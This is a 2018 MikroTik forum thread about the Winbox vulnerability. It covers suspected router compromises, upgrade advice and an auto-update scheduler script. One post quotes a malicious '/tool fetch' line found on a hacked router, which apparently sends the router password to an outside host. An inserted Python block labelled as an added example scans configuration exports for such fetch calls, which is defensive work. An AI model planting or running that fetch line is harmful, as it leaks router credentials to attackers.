I guess that it could be an infinity looped mischievous script that wakes up every specific interval and changes the configuration somehow or sends out mischievous traffic. The log could give some hints as to what it is doing, or maybe the System->History.
But if you are running RouterOS v6.43, I don't even see how this is related to this topic at all. Change your password so people that may have hacked your router before can't access it again, and clean up any possible mischievous configuration or scripts. Then implement a more secure firewall and more secure remote access.

Either way, us sitting here and guessing doesn't help anyone. Best not to go too off-topic in this thread with assumptions and speculations. Email support@mikrotik.com and they will be able to help you more closely, or make a new thread so we can all discuss your issue better.
I wish my FTP was FTL.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:35 am

Let me understand this.

1. You have an open router with no firewall
2. You ask why somebody connected to it

Correct?
No. Read everything from the beginning
I ask what kind of job is running without any config on scheduler or watchdog.
 
normis
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:43 am

Sorry I don't understand that question. Try to re-phrase it.
No answer to your question? How to write posts
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:50 am

Sorry I don't understand that question. Try to re-phrase it.
He is talking about what he said in viewtopic.php?p=685673#p685509, a job is shown to be running, yet the configuration doesn't appear to have any scripts in it.
But as I said, from the picture and config alone, I doubt we can't tell him what it is. Unless you happen to know anything else that appear in the job list than scripts.
I wish my FTP was FTL.
 
normis
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:53 am

This is normal, if you open a Terminal. There is no hacker here.
No answer to your question? How to write posts
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 10:57 am

This is normal, if you open a Terminal. There is no hacker here.
I have another similar configuration of CHR (not previously hacked). Before asking, I checked there and didn't see any jobs.
So I suspect a hacker backdoor.
 
tiktakmik
just joined
Posts: 6
Joined: Tue Sep 11, 2018 5:57 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 11:01 am

This is normal, if you open a Terminal. There is no hacker here.
ok. confirm this!


now we can go on to discuss the journey in winter
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Wed Sep 12, 2018 11:13 am

This is normal, if you open a Terminal. There is no hacker here.
I feel stupid for forgetting this detail... knew I was forgetting something.
Anyway, thanks for the confirmation.
I wish my FTP was FTL.
 
wpeople
Member
Posts: 343
Joined: Sat May 26, 2007 6:36 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 13, 2018 7:02 pm

Just found this on a customer router (where winbox was open for world, running 6.42.3) in system/scripts

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx ... artextpass")}
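
A defender-side check for the finding above, as an added example that is not part of the original post: it scans the text of a RouterOS `/export` for script and scheduler entries that call `/tool fetch`, and for an enabled web proxy. The sample export is constructed (names and URLs are placeholders), and the handling of backslash-wrapped lines assumes the usual export layout.

```python
import re

# Constructed sample in `/export` format; names and URLs are placeholders.
SAMPLE_EXPORT = r'''# constructed sample, not taken from a real router
/ip proxy
set enabled=yes port=8080
/system scheduler
add interval=30s name=upd on-event="/tool fetch url=http://example.invalid/u \
    mode=http dst-path=x"
add interval=1d name=backup on-event="/system backup save name=daily"
/system script
add name=script1 owner=admin source="{/tool fetch url=(\"http://example.invalid/a\")}"
add name=notify owner=admin source=":log info \"link up\""
'''

REVIEW_SECTIONS = ("/system script", "/system scheduler")
FETCH = re.compile(r"/tool\s+fetch\b")
ITEM_NAME = re.compile(r"(?:^|\s)name=(\S+)")

def logical_lines(text):
    """Yield (section, command), joining lines wrapped with a trailing backslash."""
    section, pending = None, ""
    for raw in text.splitlines():
        if raw.endswith("\\"):
            # Assumption: the continuation's indentation is not part of the value.
            pending += raw[:-1].lstrip()
            continue
        line = pending + raw.strip()
        pending = ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line          # menu path such as "/system script"
        else:
            yield section, line

def findings(export_text):
    """Return (section, item, reason) tuples that deserve a manual review."""
    out = []
    for section, cmd in logical_lines(export_text):
        if section in REVIEW_SECTIONS and FETCH.search(cmd):
            m = ITEM_NAME.search(cmd)
            out.append((section, m.group(1) if m else "?", "runs /tool fetch"))
        elif section == "/ip proxy" and re.search(r"\benabled=yes\b", cmd):
            out.append((section, "proxy", "web proxy enabled"))
    return out

if __name__ == "__main__":
    for hit in findings(SAMPLE_EXPORT):
        print(*hit, sep=" | ")
```

A hit is a prompt for manual review, not proof of compromise: legitimate scripts also use `/tool fetch`.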
 
spacemind
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 9:09 pm

....
Last edited by spacemind on Sat Sep 15, 2018 10:48 pm, edited 1 time in total.
 
BartoszP
Forum Guru
Posts: 1585
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 10:14 pm

What do you want to say? Do you have an example of a hacked 6.42.7, or are you just guessing and making noise?
Real admins use real keyboards.
 
spacemind
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 10:29 pm

post deleted .... contacted support instead.
Last edited by spacemind on Sat Sep 15, 2018 10:47 pm, edited 1 time in total.
 
kobuki
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 10:37 pm

What do you want to say? Do you have an example of a hacked 6.42.7, or are you just guessing and making noise?
One of a client's main routers with ROS 6.42.7 has been compromised and a lot of traffic was being generated before I replaced it with a new one.

ROS 6.42.7 with only the winbox port open to the web, and the other network routers and access points including SwOS switches are all compromised except the ones with ROS 6.18.

These crazy security holes....
I'm not advocating for Mikrotik but please stop this. It's very annoying and I'm really not sure if you're just trolling, speaking on behalf of a competitor or you have a genuine case of hacking. Tell us all details, like how you've checked there were no default empty or easy to guess passwords, proxy service or firewall rules enabled that make it easy to use the router as a starting point for hackers, etc. If you're not 100% positive the break-in is a result of a new security hole then you should consider removing your post and rethink what you post here. We're all here to share info on all the existing exploits and how to deal with them. If you happen to find a genuine one, make a support request with a supout file and file a support request instead.
 
spacemind
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Sat Sep 15, 2018 11:01 pm

kobuki, I've been using Mikrotik since version 2, and I watched the huge improvement in Mikrotik hardware. I have thousands of deployed Mikrotik networks since 2001.

Thank you for your suggestion, but I'm getting a bit tired of this magnificent hardware with crazy and buggy software.

I replaced a few hacked routers and will investigate what happened.

Bye :)
R.
 
zvekyf
just joined
Posts: 8
Joined: Thu Sep 29, 2016 1:29 am

Re: Winbox vulnerability: please upgrade

Sun Sep 16, 2018 9:18 pm

Is there maybe a plan to add an auto-update option and set that as the default option?
There are many routers which will never be updated, or not until something really bad happens.

Also, maybe add an option to auto-update only security fixes.

This way every router will be immediately patched/updated (unmanaged), and IT folks (managed) can select manual updates but set auto-update for security fixes.
 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 10:51 am

Is there maybe a plan to add an auto-update option and set that as the default option?
There are many routers which will never be updated, or not until something really bad happens.
The issue with doing that is that users won't know what is happening.
For example, if they notice their internet going down, their first instinct might be to reboot the router. Rebooting the router while it is in the middle of installing an upgrade might break the router. And the average user will not want to learn how to use NetInstall.

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
All it takes is a simple scheduler script to make it auto update, and if you make it use the "bugfix"/"long-term" channel it will only update when it is an important update.

Maybe an example of such an auto update scheduler script should be added to the wiki/manual?
I wish my FTP was FTL.
 
mrz
MikroTik Support
Posts: 5659
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 11:07 am

 
Deantwo
Member Candidate
Posts: 236
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 11:27 am

Example is already in the manual:
https://wiki.mikrotik.com/wiki/Manual:U ... to-upgrade
Ah very nice, thanks.
But it would be nice if the example also included "set channel=bugfix", since that took me a moment to find. I can't even see the word "channel" being mentioned at all on the whole page.

For example:
/system package update
set channel=bugfix
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available" ) do={ install }

EDIT: Appears to be called "release chains" on the page, here: https://wiki.mikrotik.com/wiki/Manual:U ... ase_chains
I wish my FTP was FTL.
 
spacemind
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 11:57 am


It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree, but you're wrong. It is MIKROTIK's job to update our router's software when a critical vulnerability is on the way.

If we buy Mikrotik's powerful routers, we must have this critical support.

Try to buy a Tesl.... car or other smart car with this kind of critical vulnerability and have them tell you that you need to update the software by yourself (and it's your problem if you didn't update it...)

Best Regards
R.
 
normis
MikroTik Support
Topic Author
Posts: 23452
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 12:27 pm

I disagree. It is the job of the administrator to configure the device securely, and then decide when to upgrade. MikroTik can't reboot mission critical devices without consent. We have no access to your devices.

The vulnerability doesn't affect anyone that has the default firewall, or has configured his own firewall correctly.
No answer to your question? How to write posts
 
sid5632
Member Candidate
Posts: 252
Joined: Fri Feb 17, 2017 6:05 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 12:32 pm


It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree, but you're wrong. It is MIKROTIK's job to update our router's software
No, it is you who is WRONG. Now why don't you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.
 
spacemind
Member Candidate
Posts: 106
Joined: Mon Jul 07, 2008 8:33 pm

Re: Winbox vulnerability: please upgrade

Mon Sep 17, 2018 1:02 pm


It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree, but you're wrong. It is MIKROTIK's job to update our router's software
No, it is you who is WRONG. Now why don't you toddle off to Microsoft and get a copy of Windows 10. Then you can have as many automated updates at inconvenient times as you like.
Oh... Am I wrong? ROS has bugs, but it's not Windows 10, it's much better, and don't forget that Mikrotik is sold all around the world to end customers.
